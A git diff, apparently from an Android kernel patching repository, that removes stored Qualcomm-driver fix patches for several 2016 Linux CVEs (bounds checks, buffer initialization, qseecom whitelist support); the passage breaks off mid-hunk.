--	name = dentry_path(file->f_dentry, fname, 256);
--	return strcmp(name, "/ashmem") ? 0 : 1;
-+	return (file->f_op == &ashmem_fops);
- }
- 
- int get_ashmem_file(int fd, struct file **filp, struct file **vm_file,
-@@ -819,25 +836,6 @@ void put_ashmem_file(struct file *file)
- }
- EXPORT_SYMBOL(put_ashmem_file);
- 
--static const struct file_operations ashmem_fops = {
--	.owner = THIS_MODULE,
--	.open = ashmem_open,
--	.release = ashmem_release,
--	.read = ashmem_read,
--	.llseek = ashmem_llseek,
--	.mmap = ashmem_mmap,
--	.unlocked_ioctl = ashmem_ioctl,
--#ifdef CONFIG_COMPAT
--	.compat_ioctl = compat_ashmem_ioctl,
--#endif
--};
--
--static struct miscdevice ashmem_misc = {
--	.minor = MISC_DYNAMIC_MINOR,
--	.name = "ashmem",
--	.fops = &ashmem_fops,
--};
--
- static int __init ashmem_init(void)
- {
- 	int ret;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5342/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5342/ANY/0001.patch
deleted file mode 100644
index fe78befc..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5342/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 579e796cb089324c55e0e689a180575ba81b23d9 Mon Sep 17 00:00:00 2001
-From: Anand Kumar <anandkumar@codeaurora.org>
-Date: Tue, 21 Jun 2016 17:36:05 +0530
-Subject: wcnss: Avoid user buffer overloading for write cal data
-
-compare size of allocated cal data buffer from heap
-and count bytes provided to write by user to avoid
-heap overflow for write cal data.
-
-Change-Id: Id70c3230f761385489e5e94c613f4519239dfb1f
-CRs-Fixed: 1032174
-Signed-off-by: Anand Kumar <anandkumar@codeaurora.org>
----
- drivers/net/wireless/wcnss/wcnss_wlan.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/net/wireless/wcnss/wcnss_wlan.c b/drivers/net/wireless/wcnss/wcnss_wlan.c
-index 86f3a48..3f9eeab 100644
---- a/drivers/net/wireless/wcnss/wcnss_wlan.c
-+++ b/drivers/net/wireless/wcnss/wcnss_wlan.c
-@@ -3339,7 +3339,7 @@ static ssize_t wcnss_wlan_write(struct file *fp, const char __user
- 		return -EFAULT;
- 
- 	if ((UINT32_MAX - count < penv->user_cal_rcvd) ||
--	     MAX_CALIBRATED_DATA_SIZE < count + penv->user_cal_rcvd) {
-+		(penv->user_cal_exp_size < count + penv->user_cal_rcvd)) {
- 		pr_err(DEVICE " invalid size to write %zu\n", count +
- 				penv->user_cal_rcvd);
- 		rc = -ENOMEM;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5343/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5343/ANY/0001.patch
deleted file mode 100644
index 1f15f28b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5343/ANY/0001.patch
+++ /dev/null
@@ -1,101 +0,0 @@
-From 6927e2e0af4dcac357be86ba563c9ae12354bb08 Mon Sep 17 00:00:00 2001
-From: Josh Kirsch <jkirsch@codeaurora.org>
-Date: Mon, 2 May 2016 14:55:04 -0700
-Subject: drivers: soc: Add buffer overflow check for svc send request
-
-Add buffer overflow check in voice_svc_send_req.
-
-CRs-fixed: 1010081
-Change-Id: I4ae703334b0cf04f327b392bc9cd6febd4ad32f2
-Signed-off-by: Josh Kirsch <jkirsch@codeaurora.org>
----
- drivers/soc/qcom/qdsp6v2/voice_svc.c | 46 +++++++++++++++++++++++++-----------
- 1 file changed, 32 insertions(+), 14 deletions(-)
-
-diff --git a/drivers/soc/qcom/qdsp6v2/voice_svc.c b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-index 23b8292..67c58d1 100644
---- a/drivers/soc/qcom/qdsp6v2/voice_svc.c
-+++ b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -188,7 +188,8 @@ static int voice_svc_send_req(struct voice_svc_cmd_request *apr_request,
- 	int ret = 0;
- 	void *apr_handle = NULL;
- 	struct apr_data *aprdata = NULL;
--	uint32_t user_payload_size = 0;
-+	uint32_t user_payload_size;
-+	uint32_t payload_size;
- 
- 	pr_debug("%s\n", __func__);
- 
-@@ -200,15 +201,19 @@ static int voice_svc_send_req(struct voice_svc_cmd_request *apr_request,
- 	}
- 
- 	user_payload_size = apr_request->payload_size;
-+	payload_size = sizeof(struct apr_data) + user_payload_size;
- 
--	aprdata = kmalloc(sizeof(struct apr_data) + user_payload_size,
--			  GFP_KERNEL);
--
--	if (aprdata == NULL) {
--		pr_err("%s: aprdata kmalloc failed.\n", __func__);
--
--		ret = -ENOMEM;
-+	if (payload_size <= user_payload_size) {
-+		pr_err("%s: invalid payload size ( 0x%x ).\n",
-+			__func__, user_payload_size);
-+		ret = -EINVAL;
- 		goto done;
-+	} else {
-+		aprdata = kmalloc(payload_size, GFP_KERNEL);
-+		if (aprdata == NULL) {
-+			ret = -ENOMEM;
-+			goto done;
-+		}
- 	}
- 
- 	voice_svc_update_hdr(apr_request, aprdata);
-@@ -388,18 +393,31 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 
- 	switch (cmd) {
- 	case MSG_REGISTER:
--		ret = process_reg_cmd(
-+		if (count  >=
-+				(sizeof(struct voice_svc_register) +
-+				sizeof(*data))) {
-+			ret = process_reg_cmd(
- 			(struct voice_svc_register *)data->payload, prtd);
--		if (!ret)
--			ret = count;
--
-+			if (!ret)
-+				ret = count;
-+		} else {
-+			pr_err("%s: invalid payload size\n", __func__);
-+			ret = -EINVAL;
-+			goto done;
-+		}
- 		break;
- 	case MSG_REQUEST:
-+	if (count >= (sizeof(struct voice_svc_cmd_request) +
-+					sizeof(*data))) {
- 		ret = voice_svc_send_req(
- 			(struct voice_svc_cmd_request *)data->payload, prtd);
- 		if (!ret)
- 			ret = count;
--
-+	} else {
-+		pr_err("%s: invalid payload size\n", __func__);
-+		ret = -EINVAL;
-+		goto done;
-+	}
- 		break;
- 	default:
- 		pr_debug("%s: Invalid command: %u\n", __func__, cmd);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5344/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5344/ANY/0001.patch
deleted file mode 100644
index 89c1cc05..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5344/ANY/0001.patch
+++ /dev/null
@@ -1,167 +0,0 @@
-From 64e15c36d6c1c57dc2d95a3f163bc830a469fc20 Mon Sep 17 00:00:00 2001
-From: Dhaval Patel <pdhaval@codeaurora.org>
-Date: Tue, 22 Mar 2016 22:56:38 -0700
-Subject: msm: mdss: validate layer count before copying userdata
-
-Validate input layer count in rotator and async update
-ioctl call before copying the rotator request list and
-async update layer list.
-
-Change-Id: I3489e5a2d4237a47bddf56c2f44c9e3001f0b2b4
-Signed-off-by: Dhaval Patel <pdhaval@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_compat_utils.c |  6 +++---
- drivers/video/msm/mdss/mdss_fb.c           |  6 +++---
- drivers/video/msm/mdss/mdss_fb.h           |  3 +--
- drivers/video/msm/mdss/mdss_mdp.h          |  4 +++-
- drivers/video/msm/mdss/mdss_rotator.c      | 20 +++++++++++++++++---
- 5 files changed, 27 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index 3bc5de6..e391a5a 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-  * Copyright (C) 1994 Martin Schaller
-  *
-  * 2001 - Documented with DocBook
-@@ -445,8 +445,8 @@ static int __compat_async_position_update(struct fb_info *info,
- 
- 	update_pos.input_layer_cnt = update_pos32.input_layer_cnt;
- 	layer_cnt = update_pos32.input_layer_cnt;
--	if (!layer_cnt) {
--		pr_err("no async layer to update\n");
-+	if ((!layer_cnt) || (layer_cnt > MAX_LAYER_COUNT)) {
-+		pr_err("invalid async layers :%d to update\n", layer_cnt);
- 		return -EINVAL;
- 	}
- 
-diff --git a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c
-index 73ab61e..9aa87d0 100644
---- a/drivers/video/msm/mdss/mdss_fb.c
-+++ b/drivers/video/msm/mdss/mdss_fb.c
-@@ -2,7 +2,7 @@
-  * Core MDSS framebuffer driver.
-  *
-  * Copyright (C) 2007 Google Incorporated
-- * Copyright (c) 2008-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -3781,8 +3781,8 @@ static int mdss_fb_async_position_update_ioctl(struct fb_info *info,
- 	input_layer_list = update_pos.input_layers;
- 
- 	layer_cnt = update_pos.input_layer_cnt;
--	if (!layer_cnt) {
--		pr_err("no async layers to update\n");
-+	if ((!layer_cnt) || (layer_cnt > MAX_LAYER_COUNT)) {
-+		pr_err("invalid async layers :%d to update\n", layer_cnt);
- 		return -EINVAL;
- 	}
- 
-diff --git a/drivers/video/msm/mdss/mdss_fb.h b/drivers/video/msm/mdss/mdss_fb.h
-index 9bb8b40..f4825e3 100644
---- a/drivers/video/msm/mdss/mdss_fb.h
-+++ b/drivers/video/msm/mdss/mdss_fb.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -56,7 +56,6 @@
- 
- #define MDP_PP_AD_BL_LINEAR	0x0
- #define MDP_PP_AD_BL_LINEAR_INV	0x1
--#define MAX_LAYER_COUNT		0xC
- 
- /**
-  * enum mdp_notify_event - Different frame events to indicate frame update state
-diff --git a/drivers/video/msm/mdss/mdss_mdp.h b/drivers/video/msm/mdss/mdss_mdp.h
-index b2083c5..40ec88c 100644
---- a/drivers/video/msm/mdss/mdss_mdp.h
-+++ b/drivers/video/msm/mdss/mdss_mdp.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -83,6 +83,8 @@
- 
- #define XIN_HALT_TIMEOUT_US	0x4000
- 
-+#define MAX_LAYER_COUNT		0xC
-+
- /* hw cursor can only be setup in highest mixer stage */
- #define HW_CURSOR_STAGE(mdata) \
- 	(((mdata)->max_target_zorder + MDSS_MDP_STAGE_0) - 1)
-diff --git a/drivers/video/msm/mdss/mdss_rotator.c b/drivers/video/msm/mdss/mdss_rotator.c
-index 86e3665..e3c46fc 100644
---- a/drivers/video/msm/mdss/mdss_rotator.c
-+++ b/drivers/video/msm/mdss/mdss_rotator.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -2129,6 +2129,7 @@ static int mdss_rotator_handle_request(struct mdss_rot_mgr *mgr,
- 	struct mdp_rotation_item *items = NULL;
- 	struct mdss_rot_entry_container *req = NULL;
- 	int size, ret;
-+	uint32_t req_count;
- 
- 	ret = copy_from_user(&user_req, (void __user *)arg,
- 					sizeof(user_req));
-@@ -2137,12 +2138,18 @@ static int mdss_rotator_handle_request(struct mdss_rot_mgr *mgr,
- 		return ret;
- 	}
- 
-+	req_count = user_req.count;
-+	if ((!req_count) || (req_count > MAX_LAYER_COUNT)) {
-+		pr_err("invalid rotator req count :%d\n", req_count);
-+		return -EINVAL;
-+	}
-+
- 	/*
- 	 * here, we make a copy of the items so that we can copy
- 	 * all the output fences to the client in one call.   Otherwise,
- 	 * we will have to call multiple copy_to_user
- 	 */
--	size = sizeof(struct mdp_rotation_item) * user_req.count;
-+	size = sizeof(struct mdp_rotation_item) * req_count;
- 	items = devm_kzalloc(&mgr->pdev->dev, size, GFP_KERNEL);
- 	if (!items) {
- 		pr_err("fail to allocate rotation items\n");
-@@ -2281,6 +2288,7 @@ static int mdss_rotator_handle_request32(struct mdss_rot_mgr *mgr,
- 	struct mdp_rotation_item *items = NULL;
- 	struct mdss_rot_entry_container *req = NULL;
- 	int size, ret;
-+	uint32_t req_count;
- 
- 	ret = copy_from_user(&user_req32, (void __user *)arg,
- 					sizeof(user_req32));
-@@ -2289,7 +2297,13 @@ static int mdss_rotator_handle_request32(struct mdss_rot_mgr *mgr,
- 		return ret;
- 	}
- 
--	size = sizeof(struct mdp_rotation_item) * user_req32.count;
-+	req_count = user_req32.count;
-+	if ((!req_count) || (req_count > MAX_LAYER_COUNT)) {
-+		pr_err("invalid rotator req count :%d\n", req_count);
-+		return -EINVAL;
-+	}
-+
-+	size = sizeof(struct mdp_rotation_item) * req_count;
- 	items = devm_kzalloc(&mgr->pdev->dev, size, GFP_KERNEL);
- 	if (!items) {
- 		pr_err("fail to allocate rotation items\n");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5345/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5345/ANY/0001.patch
deleted file mode 100644
index af62b131..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5345/ANY/0001.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-From 67118716a2933f6f30a25ea7e3946569a8b191c6 Mon Sep 17 00:00:00 2001
-From: Kamal Negi <kamaln@codeaurora.org>
-Date: Wed, 19 Oct 2016 18:59:11 +0530
-Subject: radio-iris: check argument values before copying the data
-
-Check arguments passed in an ioctl before copying the data to kernel
-buffers. If user sends an erroneous data, data length more than expected,
-will lead to buffer overflow.
-
-Change-Id: I663e937806f38dc3b04c8d7662cd8b045facd12b
-Signed-off-by: Kamal Negi <kamaln@codeaurora.org>
----
- drivers/media/radio/radio-iris.c | 19 ++++++++++++++++---
- 1 file changed, 16 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/media/radio/radio-iris.c b/drivers/media/radio/radio-iris.c
-index b3088eb..bd4eb92 100644
---- a/drivers/media/radio/radio-iris.c
-+++ b/drivers/media/radio/radio-iris.c
-@@ -3884,8 +3884,20 @@ static int iris_vidioc_s_ext_ctrls(struct file *file, void *priv,
- 		bytes_to_copy = (ctrl->controls[0]).size;
- 		spur_tbl_req.mode = data[0];
- 		spur_tbl_req.no_of_freqs_entries = data[1];
--		spur_data = kmalloc((data[1] * SPUR_DATA_LEN) + 2,
--							GFP_ATOMIC);
-+
-+		if (((spur_tbl_req.no_of_freqs_entries * SPUR_DATA_LEN) !=
-+					bytes_to_copy - 2) ||
-+		    ((spur_tbl_req.no_of_freqs_entries * SPUR_DATA_LEN) >
-+					2 * FM_SPUR_TBL_SIZE)) {
-+			FMDERR("Invalid data len: data[1] = %d, bytes = %zu",
-+				spur_tbl_req.no_of_freqs_entries,
-+				bytes_to_copy);
-+			retval = -EINVAL;
-+			goto END;
-+		}
-+		spur_data =
-+		    kmalloc((spur_tbl_req.no_of_freqs_entries * SPUR_DATA_LEN)
-+							+ 2, GFP_ATOMIC);
- 		if (!spur_data) {
- 			FMDERR("Allocation failed for Spur data");
- 			retval = -EFAULT;
-@@ -3900,7 +3912,8 @@ static int iris_vidioc_s_ext_ctrls(struct file *file, void *priv,
- 
- 		if (spur_tbl_req.no_of_freqs_entries <= ENTRIES_EACH_CMD) {
- 			memcpy(&spur_tbl_req.spur_data[0], spur_data,
--					(data[1] * SPUR_DATA_LEN));
-+				(spur_tbl_req.no_of_freqs_entries *
-+							SPUR_DATA_LEN));
- 			retval = radio_hci_request(radio->fm_hdev,
- 					hci_fm_set_spur_tbl_req,
- 					(unsigned long)&spur_tbl_req,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5346/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2016-5346/3.18/0001.patch
deleted file mode 100644
index 2b5b444e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5346/3.18/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 6298a474322fb2182f795a622b2faa64abfd8474 Mon Sep 17 00:00:00 2001
-From: Xiaoyu Ye <benyxy@codeaurora.org>
-Date: Wed, 7 Dec 2016 16:35:07 -0800
-Subject: drivers: soc: qcom: Add error handling in function avtimer_ioctl
-
-Error handling is added to prevent garbage value being passed to
-user space by the uninitialized local variable avtimer_tick.
-
-CRs-Fixed: 1097878
-Change-Id: I3f895deaae3acf329088cf8135859cc41e781763
-Signed-off-by: Xiaoyu Ye <benyxy@codeaurora.org>
----
- drivers/platform/msm/avtimer.c | 14 +++++++++++---
- 1 file changed, 11 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/platform/msm/avtimer.c b/drivers/platform/msm/avtimer.c
-index 2bded5e..4331af8 100644
---- a/drivers/platform/msm/avtimer.c
-+++ b/drivers/platform/msm/avtimer.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- 
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -331,9 +331,17 @@ static long avtimer_ioctl(struct file *file, unsigned int ioctl_num,
- 	switch (ioctl_num) {
- 	case IOCTL_GET_AVTIMER_TICK:
- 	{
--		uint64_t avtimer_tick;
-+		uint64_t avtimer_tick = 0;
-+		int rc;
-+
-+		rc = avcs_core_query_timer(&avtimer_tick);
-+
-+		if (rc) {
-+			pr_err("%s: Error: Invalid AV Timer tick, rc = %d\n",
-+				__func__, rc);
-+			return rc;
-+		}
- 
--		avcs_core_query_timer(&avtimer_tick);
- 		pr_debug_ratelimited("%s: AV Timer tick: time %llx\n",
- 		__func__, avtimer_tick);
- 		if (copy_to_user((void *) ioctl_param, &avtimer_tick,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5346/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2016-5346/4.4/0002.patch
deleted file mode 100644
index fb5b5e83..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5346/4.4/0002.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 25a64e34bbec7b14887cbfe8266ccf6f27113bab Mon Sep 17 00:00:00 2001
-From: Xiaoyu Ye <benyxy@codeaurora.org>
-Date: Wed, 7 Dec 2016 16:35:07 -0800
-Subject: drivers: soc: qcom: Add error handling in function avtimer_ioctl
-
-Error handling is added to prevent garbage value being passed to
-user space by the uninitialized local variable avtimer_tick.
-
-CRs-Fixed: 1097878
-Change-Id: I3f895deaae3acf329088cf8135859cc41e781763
-Signed-off-by: Xiaoyu Ye <benyxy@codeaurora.org>
----
- drivers/soc/qcom/avtimer.c | 14 +++++++++++---
- 1 file changed, 11 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/soc/qcom/avtimer.c b/drivers/soc/qcom/avtimer.c
-index 2bded5e..4331af8 100644
---- a/drivers/soc/qcom/avtimer.c
-+++ b/drivers/soc/qcom/avtimer.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- 
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -331,9 +331,17 @@ static long avtimer_ioctl(struct file *file, unsigned int ioctl_num,
- 	switch (ioctl_num) {
- 	case IOCTL_GET_AVTIMER_TICK:
- 	{
--		uint64_t avtimer_tick;
-+		uint64_t avtimer_tick = 0;
-+		int rc;
-+
-+		rc = avcs_core_query_timer(&avtimer_tick);
-+
-+		if (rc) {
-+			pr_err("%s: Error: Invalid AV Timer tick, rc = %d\n",
-+				__func__, rc);
-+			return rc;
-+		}
- 
--		avcs_core_query_timer(&avtimer_tick);
- 		pr_debug_ratelimited("%s: AV Timer tick: time %llx\n",
- 		__func__, avtimer_tick);
- 		if (copy_to_user((void *) ioctl_param, &avtimer_tick,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5347/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2016-5347/3.18/0001.patch
deleted file mode 100644
index 821b98fd..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5347/3.18/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From ed4d6f5d8451d99860950d0abf8ad583efed6d5c Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang <xsang@codeaurora.org>
-Date: Fri, 16 Dec 2016 16:25:27 +0800
-Subject: ASoC: soc: msm: initialize buffer to prevent kernel data leakage
-
-To prevent potential kernel stack data leakage, initialize
-channel_map[].
-
-CRs-Fixed: 1100878
-Change-Id: I7b81cea20485bc7514551672bb54c7fd455049e3
-Signed-off-by: Xiaojun Sang <xsang@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-qti-pp-config.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c b/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c
-index 9e34bd3..510ddc7 100644
---- a/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c
-@@ -575,7 +575,7 @@ static int msm_qti_pp_set_sec_auxpcm_lb_vol_mixer(
- static int msm_qti_pp_get_channel_map_mixer(struct snd_kcontrol *kcontrol,
- 					    struct snd_ctl_elem_value *ucontrol)
- {
--	char channel_map[PCM_FORMAT_MAX_NUM_CHANNEL];
-+	char channel_map[PCM_FORMAT_MAX_NUM_CHANNEL] = {0};
- 	int i;
- 
- 	adm_get_multi_ch_map(channel_map, ADM_PATH_PLAYBACK);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5347/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2016-5347/4.4/0002.patch
deleted file mode 100644
index 3978c945..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5347/4.4/0002.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From f14390f13e62460fc6b05fc0acde0e825374fdb6 Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang <xsang@codeaurora.org>
-Date: Fri, 16 Dec 2016 16:25:27 +0800
-Subject: ASoC: soc: msm: initialize buffer to prevent kernel data leakage
-
-To prevent potential kernel stack data leakage, initialize
-channel_map[].
-
-CRs-Fixed: 1100878
-Change-Id: I7b81cea20485bc7514551672bb54c7fd455049e3
-Signed-off-by: Xiaojun Sang <xsang@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-qti-pp-config.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c b/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c
-index 7c8af09..832d7c01 100644
---- a/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c
-@@ -579,7 +579,7 @@ static int msm_qti_pp_set_sec_auxpcm_lb_vol_mixer(
- static int msm_qti_pp_get_channel_map_mixer(struct snd_kcontrol *kcontrol,
- 					    struct snd_ctl_elem_value *ucontrol)
- {
--	char channel_map[PCM_FORMAT_MAX_NUM_CHANNEL];
-+	char channel_map[PCM_FORMAT_MAX_NUM_CHANNEL] = {0};
- 	int i;
- 
- 	adm_get_multi_ch_map(channel_map, ADM_PATH_PLAYBACK);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5349/ANY/0001.patch
deleted file mode 100644
index ea31acb6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0001.patch
+++ /dev/null
@@ -1,774 +0,0 @@
-From 7c3bf6557c62d904b15507eb451fda8fd7ef750c Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Fri, 8 Jul 2016 14:40:45 -0700
-Subject: qseecom: support whitelist memory for qseecom_send_modfd_cmd
-
-qseecom_send_modfd_cmd converts ION buffer's virtual address to
-scatter gather(SG) list and then sends them to TA by populating
-SG list into message buffer. As the physical memory address in
-SG list is used directly by TA, this allows a malicious TA to
-access/corrupt arbitrary physical memory and may lead to the
-process gaining kernel/root privileges. Thus, make changes to
-have the QSEEComm driver passing a list of whitelist buffers
-that is allowed to be mapped by TA, and the QSEE kernel, in turn,
-should add checks to the register_shared_buffer syscall to make
-sure the shared buffers an application is mapping falls within
-one of these whitelist buffers.
-
-CRs-fixed: 1021945
-Change-Id: I776ead0030cad167afcf41ab985db7151a42d126
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/misc/qseecom.c      | 370 +++++++++++++++++++++++++++++++++++++++-----
- include/soc/qcom/qseecomi.h |  47 +++++-
- 2 files changed, 375 insertions(+), 42 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 8117be74..7e6a179 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -181,6 +181,7 @@ struct qseecom_control {
- 	uint32_t          qseos_version;
- 	uint32_t          qsee_version;
- 	struct device *pdev;
-+	bool  whitelist_support;
- 	bool  commonlib_loaded;
- 	bool  commonlib64_loaded;
- 	struct ion_handle *cmnlib_ion_handle;
-@@ -242,6 +243,30 @@ struct qseecom_listener_handle {
- 
- static struct qseecom_control qseecom;
- 
-+struct sglist_info {
-+	uint32_t indexAndFlags;
-+	uint32_t sizeOrCount;
-+};
-+
-+/*
-+ * The 31th bit indicates only one or multiple physical address inside
-+ * the request buffer. If it is set,  the index locates a single physical addr
-+ * inside the request buffer, and `sizeOrCount` is the size of the memory being
-+ * shared at that physical address.
-+ * Otherwise, the index locates an array of {start, len} pairs (a
-+ * "scatter/gather list"), and `sizeOrCount` gives the number of entries in
-+ * that array.
-+ *
-+ * The 30th bit indicates 64 or 32bit address; when it is set, physical addr
-+ * and scatter gather entry sizes are 64-bit values.  Otherwise, 32-bit values.
-+ *
-+ * The bits [0:29] of `indexAndFlags` hold an offset into the request buffer.
-+ */
-+#define SGLISTINFO_SET_INDEX_FLAG(c, s, i)	\
-+	((uint32_t)(((c & 1) << 31) | ((s & 1) << 30) | (i & 0x3fffffff)))
-+
-+#define SGLISTINFO_TABLE_SIZE	(sizeof(struct sglist_info) * MAX_ION_FD)
-+
- struct qseecom_dev_handle {
- 	enum qseecom_client_handle_type type;
- 	union {
-@@ -255,6 +280,8 @@ struct qseecom_dev_handle {
- 	bool  perf_enabled;
- 	bool  fast_load_enabled;
- 	enum qseecom_bandwidth_request_mode mode;
-+	struct sglist_info *sglistinfo_ptr;
-+	uint32_t sglist_cnt;
- };
- 
- struct qseecom_key_id_usage_desc {
-@@ -565,6 +592,38 @@ static int qseecom_scm_call2(uint32_t svc_id, uint32_t tz_cmd_id,
- 			ret = scm_call2(smc_id, &desc);
- 			break;
- 		}
-+		case QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST: {
-+			struct qseecom_client_send_data_ireq *req;
-+			struct qseecom_client_send_data_64bit_ireq *req_64bit;
-+
-+			smc_id = TZ_APP_QSAPP_SEND_DATA_WITH_WHITELIST_ID;
-+			desc.arginfo =
-+			TZ_APP_QSAPP_SEND_DATA_WITH_WHITELIST_ID_PARAM_ID;
-+			if (qseecom.qsee_version < QSEE_VERSION_40) {
-+				req = (struct qseecom_client_send_data_ireq *)
-+					req_buf;
-+				desc.args[0] = req->app_id;
-+				desc.args[1] = req->req_ptr;
-+				desc.args[2] = req->req_len;
-+				desc.args[3] = req->rsp_ptr;
-+				desc.args[4] = req->rsp_len;
-+				desc.args[5] = req->sglistinfo_ptr;
-+				desc.args[6] = req->sglistinfo_len;
-+			} else {
-+				req_64bit =
-+				(struct qseecom_client_send_data_64bit_ireq *)
-+					req_buf;
-+				desc.args[0] = req_64bit->app_id;
-+				desc.args[1] = req_64bit->req_ptr;
-+				desc.args[2] = req_64bit->req_len;
-+				desc.args[3] = req_64bit->rsp_ptr;
-+				desc.args[4] = req_64bit->rsp_len;
-+				desc.args[5] = req_64bit->sglistinfo_ptr;
-+				desc.args[6] = req_64bit->sglistinfo_len;
-+			}
-+			ret = scm_call2(smc_id, &desc);
-+			break;
-+		}
- 		case QSEOS_RPMB_PROVISION_KEY_COMMAND: {
- 			struct qseecom_client_send_service_ireq *req;
- 			req = (struct qseecom_client_send_service_ireq *)
-@@ -686,6 +745,36 @@ static int qseecom_scm_call2(uint32_t svc_id, uint32_t tz_cmd_id,
- 			ret = scm_call2(smc_id, &desc);
- 			break;
- 		}
-+		case QSEOS_TEE_OPEN_SESSION_WHITELIST: {
-+			struct qseecom_qteec_ireq *req;
-+			struct qseecom_qteec_64bit_ireq *req_64bit;
-+
-+			smc_id = TZ_APP_GPAPP_OPEN_SESSION_WITH_WHITELIST_ID;
-+			desc.arginfo =
